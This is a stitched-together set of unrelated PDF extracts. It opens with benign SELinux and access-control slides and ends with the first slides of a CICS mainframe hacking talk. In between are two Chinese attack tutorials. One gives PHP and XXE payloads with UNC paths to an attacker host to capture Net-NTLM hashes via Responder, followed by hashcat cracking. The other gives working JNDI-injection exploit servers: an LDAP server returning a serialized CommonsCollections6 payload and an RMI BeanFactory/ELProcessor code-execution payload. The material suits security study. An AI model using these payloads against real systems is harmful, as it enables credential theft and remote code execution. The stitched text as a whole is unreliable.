● Access control requirements are domain-specific
○ Generic approaches over-generalize
● Access control requirements can change
○ Anyone could be an administrator
Reference : https://profile.cheezburger.com/imaguid/
Basic Concepts of Different Access Control Policies
● Discretionary (DAC): (authorization-based) policies
control access based on the identity of the requestor and
on access rules stating what requestors are (or are not)
allowed to do.
● Mandatory (MAC): policies control access based on
mandated regulations determined by a central authority.
DAC : Access Matrix Model
File 1
File 2
File 3
Program 1
Alice
own
read
write
read
write
Bob
read
read
write
execute
Charlie
read
execute
read
DAC - Identity !!
DAC weaknesses (1/2)
● Scenario
○ Bob owns a secret file, Bob can read it, but not
Daniel
○ In DAC, Bob can be cheated to leak the information
to Daniel.
○ How?
■ Trojan horse: software containing hidden code
that performs (illegitimate) functions not known to
the caller
Trojan horse - Simple Example
Bob invokes
Application (e.g. calendar)
read contacts
write stolen
code
malicious
code
Secret File content
owner Bob
Alice
06-12345678
Charlie
06-23456781
File stolen
owner Daniel
Alice
06-12345678
Charlie
06-23456781
(Bob,write,stolen)
DAC weaknesses (2/2)
• DAC constraints only identity, no control on what happens
to information during execution.
• No separation of User identity and execution instance.
• Trojan Horses exploit access privileges of calling subjects
identity.
MAC - Behavior !!
● Policies control access based on mandated
regulations determined by a central authority.
User
Application Process
Label
Bob
calendar_t
Central Authority Rule
Subject Label
Object Label
Permission
calendar_t
secret_t
No read
calendar_t
stolen_t
Read, No write
File name
Object Label
Secret file
secret_t
File stolen
stolen_t
How MAC fix the DAC weakness (1/2)
How MAC fix the DAC weakness (2/2)
Bob invokes
Calendar (calendar_t)
read contacts
write stolen
code
malicious
code
Secret File content (secret_t)
owner Bob
Alice
06-12345678
Charlie
06-23456781
File stolen (stolen_t)
owner Daniel
Alice
06-12345678
Charlie
06-23456781
(Bob,write stolen fail)
Different MAC Mechanisms
Apparmor
● Path-based system : filesystem no need to support
extended attribute
● Per-program profile : describe what program can do.
● Concept of Different Subject Domain : If you want a
different Subject Domain, you should create a hard link &
rename the program & create a new profile for it.
Apparmor Profile
Extended Attribute
Security.selinux = “Label”
File
inode
Smack
(Simplified Mandatory Access Control Kernel)
● Label base : file system should support extended attribute
● Default rules are fixed in kernel
○
Any access requested by a task labelled "*" is denied.
○
A read or execute access requested by a task labelled "^" is permitted.
○
A read or execute access requested on an object labelled "_" is
permitted.
○
Any access requested on an object labelled "*" is permitted.
○
Any access requested by a task on an object with the same label is
permitted.
○
Any access requested that is explicitly defined in the loaded rule set is
permitted.
○
Any other access is denied.
SELinux
● Label base : file system should support extended attribute
● Finer granularity :
● Different MAC model support :
Type Enforcement, MCS, MLS, RBAC
● Hard to learn
Subject
Object:Class
Action
Why Choose SELinux : Comparison
NAME
SELinux
Smack
Apparmor
Type
MAC
MAC
MAC
Granularity
(Hook Point)
176
114
62
Extended Attribute
Yes
Yes
No
Separation of Policy and
Mechanism
Yes
Partial
Yes
SELinux Concept (1/2)
Object
Label
Process
Request
Resource
(e.g. files,
printers)
Access
Request
Subject
Label
● Mode :
○ Enforce & Permissive & Disable
● Label Format :
○ User:Role:Type:Range
SELinux Concept Outline (2/2)
● Type Enforcement (TE): Type Enforcement is the primary
mechanism of access control used in the targeted policy
● Multi-Category Security(MCS): An extension of
Multi-Level Security.
● Multi-Level Security (MLS): Not commonly used and
often hidden in the default targeted policy.
Type enforcement (1/2)
Reference : https://opensource.com/business/13/11/selinux-policy-guide
Type enforcement (2/2)
MCS (1/2)
MCS (2/2)
MLS (1/2)
MLS (2/2)
How to Use SELinux Management Tool
Enable SELinux First !
SELinux Management : Get Selinux Context (Label)
● ls -Z (get file selinux context)
● ps Z (get process selinux context)
● seinfo -t : lists all contexts currently in use on your system
SELinux Management :
2 Step Used to Relabel File Type Using Setfiles
● File_contexts : used by the file labeling utilities.
● semanage fcontext --add --type httpd_sys_content_t
"/var/www(/.*)?"
○ First write the new context to the
/etc/selinux/targeted/contexts/files/file_contexts.local
file.
● setfiles file_contexts /var/www
○ Next, we will run the setfiles command. This will relabel
the file or directory with what's been recorded in the
previous step
SELinux Management :
Command to Change File Label & Check Policy
● chcon --type bin_t test.c
○ change the context of the file.
● runcon -t kernel_t /bin/bash
● sesearch --allow --source kernel_t --target proc_t
○ check the type of access allowed for ourselves
SELinux Management :
Boolean
● List Boolean :
○ getsebool -a
● Set Boolean :
○ setsebool BooleanName (1
or 0)
Troubleshoot : Audit Message (1/2)
● avc : denied { relabelto } for pid=1382 comm=”chcon”
name=”test.c” dev=”sda1” ino=418253
scontext=system_u:system_r:kernel_t:s0
tcontext=system_u:object_r:unconfined_t:s0 tclass=file
● Dmesg | grep avc | audit2allow -M test
○ Generate test.pp, use semodule -i test.pp to install
policy module.
Troubleshoot : Audit Message (2/2)
User to Developer : What Change ?
SELinux Architecture - LSM Hook
LSM Hook and SELinux Security Server
System Call
Interface
Entry Points
Security
Server
with
Central
Policy
Access
Hook
Security-sensitive
Operation
Authorize
Request ?
Yes/No
Access
Hook
Access
Hook
Security-sensitive
Operation
Security-sensitive
Operation
Reference : http://web.eecs.umich.edu/~aprakash/security/handouts/AccessModel_040112_v2.ppt
SELinux Architecture - SELinux-aware Application
What is the SELinux-aware Package
.te
.if
.fc
Refpolicy
Program
Behavior
SELinux-aware Level
1.
Unaware (e.q. rm)
2.
Aware, but not necessary (e.q. ls, ps)
3.
Access Securityfs without checking special class (e.q. getenforce)
4.
In addition to access Securityfs, check the permission in special class below
(e.q. systemd, init, setenforce)
a.
File, Socket, Database, Filesystem class
i.
Relabelto
ii.
Relabelfrom
b.
Process class
i.
Dyntransition
ii.
Setexec
iii.
Setfscreate
iv.
Setkeycreate
v.
Setsockcreate
c.
Security class
d.
Kernel service class
Example : Linux Initialization
init
Getty & Login
init.rc
PAM : Authenticate User
&
Compute corresponding
SELinux user context
Load policy &
Reexecute itself to
change context
seusers
contexts/users/...
SELinux Architecture - Build Policy
How to Write Policy by Yourself
Monolithic
Base
Policy
Module
● All build by 3 file :
○ .te : like .c file
○ .if : like .h file
○ .fc (describe file context)
Policy Build Sequence
Kernel
Policy
Language
Policy Set
(Written with M4
macro language)
Policy
Binary
Macro Expansion
Checkpolicy
or
Checkmodule
Secure Boot
Reference : https://developer.ibm.com/articles/protect-system-firmware-openpower/
Access Control - SELinux
Integrity - IMA/EVM
Call Our Team
pchang9
The 9th Generation
pchang
Yi-Ting
大
頭
Q&A X SELinux Demo
59
SELinux enforce mode
SELinux permissive mode
Busybox (Embedded System)
Ubuntu
限定指定資料夾
僅能指定程序存取
保護特定程序
不被任何人kill
SELinux enforce mode
on Raspberry Pi 3 Model B+ | pdf |
Author: pen4uin
0x00 写在前面
0x01 获取Net-NTLM Hash
0x02 可利用的函数
01 include()
02 include_once()
03 require()
04 require_once()
05 file_get_contents()
06 file()
07 readfile()
08 file_exists()
09 filesize()
10 unlink()
11 fopen()
12 is_file()
13 file_put_contents()
∞ xxx()
0x03 可能出现的漏洞场景
SSRF
file://
XXE
php://filter
文件包含
文件删除
文件下载
文件读取
0x04 NTLM利用姿势
暴力破解
0x00 写在前面
相信大家也都有看过一些关于获取Net-NTLM Hash文章,但是我感觉利用场景都更偏向于已突破网
络边界的情况(比如社工钓鱼/RCE等手段),于是在这篇文章里我针对一些常见的Web场景
(PHP+Window)下对获取Net-NTLM Hash姿势的进行了测试,目前自己还未在实战场景测试,不知道效
果如何,师傅们就当作扩展思路吧!
0x01 获取Net-NTLM Hash
使用Responder获取Net-NTLM Hash
git clone https://github.com/lgandx/Responder.git
cd Responder/
./Responder.py -I eth0 -rv
0x02 可利用的函数
测试了大概20+的函数,这里仅以下面的demo演示效果
01 include()
<?php
include '\\\\10.10.10.3\tmp';
02 include_once()
03 require()
<?php
include_once '\\\\10.10.10.3\tmp';
<?php
require '\\\\10.10.10.3\tmp';
04 require_once()
<?php
require_once '\\\\10.10.10.3\tmp';
05 file_get_contents()
<?php
$demo = file_get_contents('\\\\10.10.10.3\tmp');
06 file()
<?php
$lines = file('\\\\10.10.10.3\tmp');
07 readfile()
08 file_exists()
<?php
$file = '\\\\10.10.10.3\tmp';
readfile($file);
<?php
$file = '\\\\10.10.10.3\tmp';
if (file_exists($file)) {
exit;
}
09 filesize()
<?php
$demo = filesize('\\\\10.10.10.3\tmp');
10 unlink()
<?php
$file = '\\\\10.10.10.3\tmp';
unlink($file);
11 fopen()
<?php
$file = '\\\\10.10.10.3\tmp';
fopen($file,'a');
12 is_file()
同类函数还有
<?php
$file = '\\\\10.10.10.3\tmp';
var_dump(is_file($file));
is_dir()
is_executable()
is_link()
is_readable()
is_uploaded_file()
is_writable()
is_writeable()
13 file_put_contents()
∞ xxx()
可达到以上效果的函数还有很多,这里就不再测试了,重在思路分享。
下面将列举几种实战中可能会出现的场景。
0x03 可能出现的漏洞场景
注:以下只是为了演示效果所以demo代码过于简单
<?php
$file = '\\\\10.10.10.3\tmp.txt';
file_put_contents($file, 'pen4uin.');
SSRF
demo.php
file://
payload
<?php
$location=$_GET['path'];
$curl = curl_init($location);
curl_exec ($curl);
curl_close ($curl);
?>
?path=file://\\10.10.10.3\tmp
XXE
靶场
https://github.com/c0ny1/xxe-lab
php://filter
payload
文件包含
demo.php
payload
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE a[
<!ENTITY xxe SYSTEM "php://filter/convert.base64-
encode/resource=//10.10.10.3/tmp.php">
]>
<user><username>&xxe;</username><password>admin</password></user>
<?php
$file = $_GET['file'];
include($file);
?file=\\10.10.10.3\tmp
文件删除
demo.php
<?php
$file = $_GET['file'];
unlink($file);
文件下载
如果存在一处文件下载的地方,一般会先判断所下载的文件是否存在
demo.php
<?php
$filename = $_GET['file'];
if(file_exists($filename)){
header('location:http://'.$filename);
}else{
header('HTTP/1.1 404 Not Found');
}
文件读取
demo.php
<?php
$filename = $_GET['file'];
readfile($filename);
0x04 NTLM利用姿势
NTLM利用不是这篇文章的重点,这里分享一下常见的利用方式,感兴趣的师傅可自行研究测试。
利用思路
暴力破解
Relay 中继
SMB
EWS(Exchange)
LDAP
暴力破解
利用hashcat 基于字典进行离线爆破
参数说明
5600 Net-NTLM
如图
tip:
密码字典可以从每一次的项目中累积,毕竟这样更接近于实战场景的需求
hashcat -m 5600
admin::.:88c06d46a5e743c5:FBD01056A7EBB9A06D69857C12D5F9DC:010100000000000000F4A
E876EB0D70195F68AC7D41F46370000000002000800320043004B004F0001001E00570049004E002
D0045003600380033003000590056004C0035005A00520004003400570049004E002D00450036003
80033003000590056004C0035005A0052002E00320043004B004F002E004C004F00430041004C000
3001400320043004B004F002E004C004F00430041004C0005001400320043004B004F002E004C004
F00430041004C000700080000F4AE876EB0D70106000400020000000800300030000000000000000
100000000200000AD34DB253663E6DF661C39C7D5712180BFA6346A77811E487B52B1C40C5853150
A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E003
10030002E00310030002E0033000000000000000000 /root/Desktop/Responder/password-
top1000.dict --force | pdf |
JNDI 注⼊利⽤ Bypass ⾼版本 JDK 限制
0x00 前⾔
JNDI 注⼊利⽤⾮常⼴泛但是在⾼版本 JDK 中由于默认 codebase 为 true 从⽽导致客户端默认不会请求远程Server
上的恶意 Class,不过这种⼿法也有 Bypass 的⽅式,本⽂主要学习 KINGX 师傅所提出的两种 Bypass 的⽅法
KINGX 师傅⽂章链接:https://mp.weixin.qq.com/s/Dq1CPbUDLKH2IN0NA_nBDA
JNDI 注⼊通常利⽤ rmi 、ldap 两种⽅式来进⾏利⽤,其中 ldap 所适⽤的 JDK 版本更加多⼀些
RMI:JDK 8u113、JDK 7u122、JDK 6u132 起 codebase 默认为 true
LDAP:JDK 11.0.1、JDK 8u191、JDK 7u201、JDK 6u211 起 codebase 默认为 true
关于 JNDI 注⼊的⽂章可以看KINGX师傅的
⽂章链接:https://mp.weixin.qq.com/s?__biz=MzAxNTg0ODU4OQ==&mid=2650358440&idx=1&sn=e005f72
1beb8584b2c2a19911c8fef67&chksm=83f0274ab487ae5c250ae8747d7a8dc7d60f8c5bdc9ff63d0d930dca63
199f13d4648ffae1d0&scene=21#wechat_redirect
0x01 Bypass 1:返回序列化Payload,触发本地Gadget
由于在⾼版本 JDK 中 codebase 默认为 true 就导致客户端⽆法请求未受信任的远程Server上的 class,所以既然不
能远程那么就尝试来攻击本地 classpath
当我们开启⼀个恶意的 Server 并控制返回的数据,由于返回的数据是序列化的,所以当客户端接收到数据之后会
进⾏反序列化操作,那么如果客户端本地存在有反序列化漏洞的组件那么就可以直接触发
Evil LDAP Server
/**
* In this case
* Server return Serialize Payload, such as CommonsCollections
* if Client's ClassPath exists lib which is vulnerability version So We can use it
* Code part from marshalsec
*/
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.text.ParseException;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import com.unboundid.util.Base64;
public class HackerLdapServer {
private static final String LDAP_BASE = "dc=example,dc=com";
public static void main ( String[] args ) {
int port = 1389;
try {
InMemoryDirectoryServerConfig config = new
InMemoryDirectoryServerConfig(LDAP_BASE);
config.setListenerConfigs(new InMemoryListenerConfig(
"listen", //$NON-NLS-1$
InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
port,
ServerSocketFactory.getDefault(),
SocketFactory.getDefault(),
(SSLSocketFactory) SSLSocketFactory.getDefault()));
config.addInMemoryOperationInterceptor(new OperationInterceptor());
InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
ds.startListening();
}
catch ( Exception e ) {
e.printStackTrace();
}
}
// in this class remove the construct
private static class OperationInterceptor extends InMemoryOperationInterceptor {
@Override
public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
String base = "Exploit";
Entry e = new Entry(base);
try {
sendResult(result, base, e);
}
catch ( Exception e1 ) {
e1.printStackTrace();
}
}
protected void sendResult ( InMemoryInterceptedSearchResult result, String
base, Entry e ) throws LDAPException, MalformedURLException, ParseException {
e.addAttribute("javaClassName", "foo");
// java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections6 'open
/System/Applications/Calculator.app'|base64
这⾥返回的是 CommonsCollections6 的序列化 payload ,所以本地 classpath 需要有这个包,添加到 pom.xml
中
Victim Client
e.addAttribute("javaSerializedData",
Base64.decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNy
ADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJ
MAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcm
cuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb
3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9u
cy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1
lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcG
FjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY
2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJ
aUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5
jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3
N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyY
W1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhw
AAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXR
ob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAA
AAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4c
HZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AChvcGVuIC9TeXN0
ZW0vQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwdAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZ
hLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeH
AAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/Q
AAAAAAAAHcIAAAAEAAAAAB4eHg="));
result.sendSearchEntry(e);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
}
}
}
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.1</version>
</dependency>
package JNDI.LocalGadgetBypass.Client;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.Hashtable;
可以看到意料之内的弹出了计算器
分析
上⾯的 恶意 LDAP Server 中其实最关键的是以下这个函数
可以看到该函数中将序列化payload放到了 javaSerializedData 变量中
/**
* codebase: true (means client will not download class from remote Server which is
unreliable)
*/
public class VictimClient {
public static void main(String[] args) throws NamingException {
Hashtable<String,String> env = new Hashtable<>();
Context context = new InitialContext(env);
context.lookup("ldap://127.0.0.1:1389/Exploit");
}
}
protected void sendResult ( InMemoryInterceptedSearchResult result, String
base, Entry e ) throws LDAPException, MalformedURLException, ParseException {
e.addAttribute("javaClassName", "foo");
// java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections6 'open
/System/Applications/Calculator.app'|base64
e.addAttribute("javaSerializedData", Base64.decode("序列化payload"));
result.sendSearchEntry(e);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
}
接下来我们来进⾏正向分析,同时想清楚作者是如何发现 javaSerializedData 这个变量的
因为恶意Server只是返回序列化payload,所以在调试分析中并不是我关注的重点,我所关注的是客户端是如何将
返回的数据进⾏反序列化并进⾏触发,所以我在 lookup 处打了断点
前期我们只需要重点关注 lookup 就⾏了,不断的进⾏跟进
最后会来到 com.sun.jndi.ldap.LdapCtx#c_lookup,我们这⾥注意到 JAVA_ATTRIBUTES 变量
JAVA_ATTRIBUTES 为⼀个 String 数组,这⾥的 JAVA_ATTRIBUTES[2] 对应的就是 javaClassName ,也就是说如
果 javaClassName 不为 null 那么就会调⽤ Obj.decodeObject 来处理 var4
static final String[] JAVA_ATTRIBUTES = new String[]{"objectClass",
"javaSerializedData", "javaClassName", "javaFactory", "javaCodeBase",
"javaReferenceAddress", "javaClassNames", "javaRemoteLocation"};
这⾥的 var4 就是恶意 Server 所返回的值
跟进 decodeObject 函数,在该函数中对不同的返回值的情况做了不同的处理,这个地⽅⾮常关键我们来仔细分析
⼀下
这三个判断主要针对返回值的不同来进⾏不同的调⽤,其中第⼀个判断就是我们 bypass 的触发点
protected void sendResult ( InMemoryInterceptedSearchResult result, String base,
Entry e ) throws LDAPException, MalformedURLException, ParseException {
e.addAttribute("javaClassName", "foo");
e.addAttribute("javaSerializedData", Base64.decode("序列化payload"));
result.sendSearchEntry(e);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
}
先来看第⼀个判断
JAVA_ATTRIBUTES[1] => javaSerializedData
在第⼀个判断中会判断我们返回的值获取 javaSerializedData 所对应的值,如果不为 null 的话就会调⽤
deserializeObject 进⾏反序列化,这不就是我们当前的 bypass ⼿法嘛
所以如果我们当前 classpath 中存在 CommonsCollections 3.1-3.2.1 那么这⾥就会直接进⾏触发
接下来看第⼆个判断
JAVA_ATTRIBUTES[7] => javaRemoteLocation,JAVA_ATTRIBUTES[2] => javaClassName
如果返回值中 javaRemoteLocation 对应的数值不为 null 就会调⽤ decodeRmiObject 函数
在 decodeRmiObject 中 new 了⼀个 Reference并进⾏返回
接下来看第三个判断
这个判断其实就是 jndi 注⼊的触发点,即远程加载 class 并反序列化
if ((var1 = var0.get(JAVA_ATTRIBUTES[1])) != null) {
ClassLoader var3 = helper.getURLClassLoader(var2);
return deserializeObject((byte[])((byte[])var1.get()), var3);
} else if ((var1 = var0.get(JAVA_ATTRIBUTES[7])) != null) {
return decodeRmiObject((String)var0.get(JAVA_ATTRIBUTES[2]).get(),
(String)var1.get(), var2);
} else {
var1 = var0.get(JAVA_ATTRIBUTES[0]);
return var1 == null || !var1.contains(JAVA_OBJECT_CLASSES[2]) &&
!var1.contains(JAVA_OBJECT_CLASSES_LOWER[2]) ? null : decodeReference(var0, var2);
}
if ((var1 = var0.get(JAVA_ATTRIBUTES[1])) != null) {
ClassLoader var3 = helper.getURLClassLoader(var2);
return deserializeObject((byte[])((byte[])var1.get()), var3);
}
else if ((var1 = var0.get(JAVA_ATTRIBUTES[7])) != null) {
return decodeRmiObject((String)var0.get(JAVA_ATTRIBUTES[2]).get(),
(String)var1.get(), var2);
}
然后就是 urlclassloader 远程获取并进⾏反序列化操作
else {
var1 = var0.get(JAVA_ATTRIBUTES[0]);
return var1 == null || !var1.contains(JAVA_OBJECT_CLASSES[2]) &&
!var1.contains(JAVA_OBJECT_CLASSES_LOWER[2]) ? null : decodeReference(var0, var2);
}
0x02 Bypass 2:利⽤本地Class作为Reference Factory
RMI 返回的 Reference 对象会指定⼀个 Factory,正常情况下会调⽤ factory.getObjectInstance 来远程获取外部
对象实例,但是由于 codebase 限制,我们不能加载未受信任的地址。
所以我们可以构造 Reference 并将其指向我们本地 classpath 中存在的类,但是该类必须要符合⼀些条件(下⽂有
介绍)
本种bypass⽅法利⽤了 org.apache.naming.factory.BeanFactory ,中会通过反射的⽅式实例化Reference所指向
的任意Bean Class,并且会调⽤setter⽅法为所有的属性赋值。⽽该Bean Class的类名、属性、属性值,全都来⾃
于Reference对象,均是攻击者可控的。
该包存在于 Tomcat 依赖包所以应⽤还是⽐较⼴泛
Evil RMI Server
RefAddr var17 = (RefAddr)deserializeObject(var13.decodeBuffer(var6.substring(var19)),
var14);
var15.setElementAt(var17, var12);
package JNDI.FactoryBypass.Server;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class HackerRmiServer {
public static void lanuchRMIregister(Integer rmi_port) throws Exception {
System.out.println("Creating RMI Registry, RMI Port:"+rmi_port);
pom.xml
Registry registry = LocateRegistry.createRegistry(rmi_port);
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "",
true,"org.apache.naming.factory.BeanFactory",null);
ref.add(new StringRefAddr("forceString", "x=eval"));
ref.add(new StringRefAddr("x",
"\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineB
yName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])']
(['/usr/bin/open','/System/Applications/Calculator.app']).start()\")"));
ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
registry.bind("Exploit", referenceWrapper);
System.out.println(referenceWrapper.getReference());
}
public static void main(String[] args) throws Exception {
lanuchRMIregister(1099);
}
}
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-catalina</artifactId>
<version>9.0.20</version>
</dependency>
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-dbcp</artifactId>
<version>9.0.8</version>
</dependency>
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-jasper</artifactId>
<version>9.0.20</version>
</dependency>
Victim Client
分析
客户端前期获取 stub 的过程这边就不多介绍了,感兴趣的师傅可以⾃⼰调试⼀下
com.sun.jndi.rmi.registry#RegistryContext
这⾥的 var2 就是 stub,我们直接跟进 decodeObject
来看 decodeObject 函数,前半部分就是获取 Reference 然后赋值给 var8 ,接下来会有⼀个判断:
1. 获取到的 Reference 是否为null
2. Reference 中 classFactoryLocation 是否为null
3. trustURLCodebase 是否为 true
由于是 bypass jndi 所以 codebase ⾃然是为 true 的 ,同时这⾥的 classFactoryClassLocation 也为 null 所以进
⼊到 NamingManager.getObjectInstance
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.Hashtable;
public class VictimClient {
public static void main(String[] args) throws NamingException {
Hashtable<String,String> env = new Hashtable<>();
Context context = new InitialContext(env);
context.lookup("rmi://127.0.0.1:1099/Exploit");
}
}
NamingManager.getObjectInstance
在前⾯有说到客户端收到 RMI Server 返回到 reference ,其中 reference 会指向⼀个 factory,所以⾸先调⽤
String f = ref.getFactoryClassName(); 将 reference 中指向的 factory 获取其名字,然后传⼊
getObjectFactoryFromReference(ref, f); 在该函数中会将 factory 进⾏实例化
在 getObjectFactoryFromReference 中对 factory 进⾏了实例化,这⾥的 factory 就是我们恶意 RMI Server 中构
造 reference 所指向的 factory org.apache.naming.factory.BeanFactory
重新回到 NamingManager.getObjectInstance ,这⾥的 factory 已实例化,接下来掉⽤了 factory 的
getObjectInstance 函数
所以这⾥其实我们可以看到这⾥我们 reference 指定的 factory 类并不是任意都可以的,必须要有
getObjectInstance ⽅法
factory#getObjectInstance ⽅法就是⽤来获取远程对象实例的
接下来就会来到我们指定的 org.apache.naming.factory.BeanFactory 中的 getObjectInstance ⽅法
在分析函数之前我们先来看看我们 RMI Server 上的 payload
在 getObjectInstance 函数的开头,通过 getClassName 获取了我们 payload 中指定的 javax.el.ELProcessor 类
并进⾏了实例化
(为什么要指定这个类在下⽂进⾏介绍)
继续看函数的下半部分,⾸先对 javax.el.ELProcessor 进⾏了实例化,并调⽤ ref.get("forceString") 获取到 ra
来到 if ⾥⾯,通过 getContent 获取值 x=eval ,然后会设置参数类型为 String, Class<?>[] paramTypes =
new Class[]{String.class}; ,如果value 中存在 , 就进⾏分割
接下来会获取 value 中 = 的索引位置,如果value中存在 = 就会进⾏分割赋值,如果不存在 = 就会获取param 的
set 函数
如 param 为 demo => setDemo
// 指定了执⾏了 className 为 javax.el.ELProcessor ,在 getObjectInstance 中会调⽤
getClassName 获取 className 并进⾏世例化
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "",
true,"org.apache.naming.factory.BeanFactory",null);
// 设置 forceString 为 x=eval
ref.add(new StringRefAddr("forceString", "x=eval"));
// 同样对 x 进⾏设置,具体原因看下⽂
ref.add(new StringRefAddr("x",
"\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineB
yName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])']
(['/usr/bin/open','/System/Applications/Calculator.app']).start()\")"));
Type: forceString
Content: x=eval
然后来到 forced.put(param, beanClass.getMethod(propName, paramTypes)); 将 param 和 ⽅法添加到
forced 这个map 中
然后从 forced 中取出⽅法进⾏反射调⽤
所以这⾥就来解释⼀下为什么找 public java.lang.Object
javax.el.ELProcessor.eval(java.lang.String) ⽽不是其他类
其实从上⾯的代码可看出要想被添加到 forced 中需要符合⼀些条件
1. ⽬标类必须有⽆参构造函数 => beanClass.getConstructor().newInstance()
2. 函数要为 public 同时参数类型为 String => forced.put(param, beanClass.getMethod(propName,
paramTypes));
所以这⾥要实现 RCE 的化ELProcessor#eval ⾃然是最合适不过的了
所以作者显示寻找到了 org.apache.naming.factory.BeanFactory 然后在该类的 getObjectInstance ⽅法中
能调⽤符合特定要求的 String ⽅法,所以作者寻找到了 javax.el.ELProcessor#eval 并在 getObjectInstance
中通过反射实例化了 ELProcessor 类最终调⽤ eval ⽅法
0x03 参考链接
https://www.veracode.com/blog/research/exploiting-jndi-injections-java
https://mp.weixin.qq.com/s/Dq1CPbUDLKH2IN0NA_nBDA | pdf |
Ayoub ELAASSAL
[email protected]
@ayoul3__
CICS BREAKDOWN
Hack your way to transaction city
© WAVESTONE
2
What people think of when I talk about mainframes
© WAVESTONE
3
The reality: IBM zEC 13 technical specs:
• 10 TB of RAM
• 141 processors,5 GHz
• Dedicated processors for JAVA, XML and
UNIX
• Cryptographic chips…
Badass Badass Badass !!
So what…who uses those anymore ?
© WAVESTONE
4
APIS IT - Atos Origin - Applabs - Arby’s – Wendy’s Group - Archer Daniels Midland - Assurant - AT&T / BellSouth / Cingular - Atlanta Housing Authority - Atlanta Journal
